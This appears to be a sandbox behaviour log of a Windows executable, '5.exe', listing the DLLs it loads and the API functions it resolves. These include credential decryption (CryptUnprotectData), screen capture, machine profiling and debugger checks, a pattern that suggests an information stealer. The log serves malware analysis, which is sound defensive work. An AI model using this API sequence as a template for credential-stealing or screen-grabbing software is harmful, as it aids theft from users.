Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x76c4ce2e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76c3179c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77163002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x76c359e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetThreadPriorityBoost, address_out = 0x76cb43cf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x76c37a2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x76c3492b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeA, address_out = 0x76c4ef75 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x76c3588e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x76c3110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessIoCounters, address_out = 0x76cb3116 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x76c317d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x76c310ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSetInformation, address_out = 0x76c35651 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76c31282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x76c34a2d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleCount, address_out = 0x76c3cb29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x76c33531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x76c33587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x76c31400 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedDecrement, address_out = 0x76c313f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x74d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitializeAcl, address_out = 0x74d545cd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = MapGenericMask, address_out = 0x74d67a73 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeNameW, address_out = 0x74d81fab True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ReportEventW, address_out = 0x74d4c839 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75ad0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = EnumEnhMetaFile, address_out = 0x75af5948 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetEnhMetaFileHeader, address_out = 0x75af59f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetMapperFlags, address_out = 0x75af2613 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = StretchDIBits, address_out = 0x75ae7435 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SwapBuffers, address_out = 0x75b159fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetGraphicsMode, address_out = 0x75aec182 True 1
Fn
Module Load module_name = MSIMG32.dll, base_address = 0x74060000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msimg32.dll, function = TransparentBlt, address_out = 0x74061320 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msimg32.dll, function = AlphaBlend, address_out = 0x74061210 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x74f40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMenuInfo, address_out = 0x74f7c151 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadImageA, address_out = 0x74f68455 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyIcon, address_out = 0x74f649b2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x74f61341 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetPropA, address_out = 0x74f67b5a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CopyImage, address_out = 0x74f64a09 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = FindWindowW, address_out = 0x74f598fd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawTextExW, address_out = 0x74f6149e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x74f61361 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetScrollRange, address_out = 0x74f7d50b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetDC, address_out = 0x74f572c4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetPropA, address_out = 0x74f6822c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PeekMessageA, address_out = 0x74f65f74 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowScrollBar, address_out = 0x74f64162 True 1
Fn
Module Load module_name = WINHTTP.dll, base_address = 0x74000000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpQueryHeaders, address_out = 0x7400ba51 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpQueryAuthSchemes, address_out = 0x74034101 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpCloseHandle, address_out = 0x74002c01 True 1
Fn
System Get Time type = System Time, time = 2019-03-24 16:36:38 (UTC) True 1
Fn
System Get Time type = Ticks, time = 121462 True 1
Fn
System Get Time type = Performance Ctr, time = 18375974385 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76c3359f True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, size = 260 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
System Get Time type = Local Time, time = 2019-03-25 03:36:38 (Local Time) True 135
Fn
File Get Info filename = STD_ERROR_HANDLE, type = size, size_out = 8383776169708 False 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = size, size_out = 8383776169708 False 248
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x76c349d7 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x77162c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x76c32d3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x76c3168c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x76c3110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersion, address_out = 0x76c34467 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetThreadLocale, address_out = 0x76c335cf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoA, address_out = 0x76c30e00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoA, address_out = 0x76c4d5e5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76c31282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Module Load module_name = user32.dll, base_address = 0x74f40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardType, address_out = 0x74f99ac4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x74fafd1e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharNextA, address_out = 0x74f57a1b True 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x74d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExA, address_out = 0x74d548ef True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExA, address_out = 0x74d54907 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Module Load module_name = oleaut32.dll, base_address = 0x75220000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SysFreeString, address_out = 0x75223e59 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SysReAllocStringLen, address_out = 0x75227810 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SysAllocStringLen, address_out = 0x752245d2 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x76c31245 True 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x74d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExA, address_out = 0x74d54907 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyA, address_out = 0x74d6a299 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x74d5412e True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76c31282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x76c310ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x76c32d3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x76c349d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalUnlock, address_out = 0x76c4cfdf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalLock, address_out = 0x76c4d0a7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x76c3110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemInfo, address_out = 0x76c349ca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x76c31245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x76c31b18 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x76c34435 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x76c34442 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x76c389b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x76c34259 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x76c5830d True 1
Fn
Module Load module_name = gdi32.dll, base_address = 0x75ad0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x75ae4f70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x75ae5689 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x75ae58b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x75ae54f4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x75ae5f49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = BitBlt, address_out = 0x75ae5ea6 True 1
Fn
Module Load module_name = user32.dll, base_address = 0x74f40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ReleaseDC, address_out = 0x74f57446 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x74f57d2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetDC, address_out = 0x74f572c4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharToOemBuffA, address_out = 0x74f6b1b0 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x755e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleInitialize, address_out = 0x755fefd7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75629d0b True 1
Fn
Module Load module_name = msvcr100.dll, base_address = 0x749c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x749dc544 True 1
Fn
Module Get Handle module_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, base_address = 0x400000 True 1
Fn
Keyboard Get Info type = 0, result_out = 4 True 1
Fn
System Get Info type = Operating System True 2
Fn
Module Load module_name = crypt32.dll, base_address = 0x759b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptUnprotectData, address_out = 0x759e5a7f True 1
Fn
Module Load module_name = crtdll.dll, base_address = 0x6c240000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crtdll.dll, function = wcscmp, address_out = 0x6c25032a True 1
Fn
Module Load module_name = Gdiplus.dll, base_address = 0x73e20000 True 1
Fn
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, function = GdiplusStartup, address_out = 0x73e45600 True 1
Fn
Module Load module_name = Gdiplus.dll, base_address = 0x73e20000 True 1
Fn
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, function = GdiplusShutdown, address_out = 0x73e456be True 1
Fn
Module Load module_name = Gdiplus.dll, base_address = 0x73e20000 True 1
Fn
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, function = GdipCreateBitmapFromHBITMAP, address_out = 0x73e56671 True 1
Fn
Module Load module_name = Gdiplus.dll, base_address = 0x73e20000 True 1
Fn
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, function = GdipGetImageEncodersSize, address_out = 0x73e62203 True 1
Fn
Module Load module_name = Gdiplus.dll, base_address = 0x73e20000 True 1
Fn
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, function = GdipGetImageEncoders, address_out = 0x73e6228c True 1
Fn
Module Load module_name = Gdiplus.dll, base_address = 0x73e20000 True 1
Fn
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, function = GdipDisposeImage, address_out = 0x73e54cc8 True 1
Fn
Module Load module_name = Gdiplus.dll, base_address = 0x73e20000 True 1
Fn
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, function = GdipSaveImageToStream, address_out = 0x73e54153 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x755e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CreateStreamOnHGlobal, address_out = 0x7560363b True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x755e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = GetHGlobalFromStream, address_out = 0x756041d5 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x76c34173 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x76c3dd0e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatus, address_out = 0x76c38b6d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x76c3196e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x76c33ed3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x76c31b18 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexA, address_out = 0x76c34c6b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseMutex, address_out = 0x76c3111e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentDirectoryW, address_out = 0x76c35611 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableW, address_out = 0x76c389f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x76c31b48 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetCurrentDirectoryW, address_out = 0x76c41260 True 1
Fn
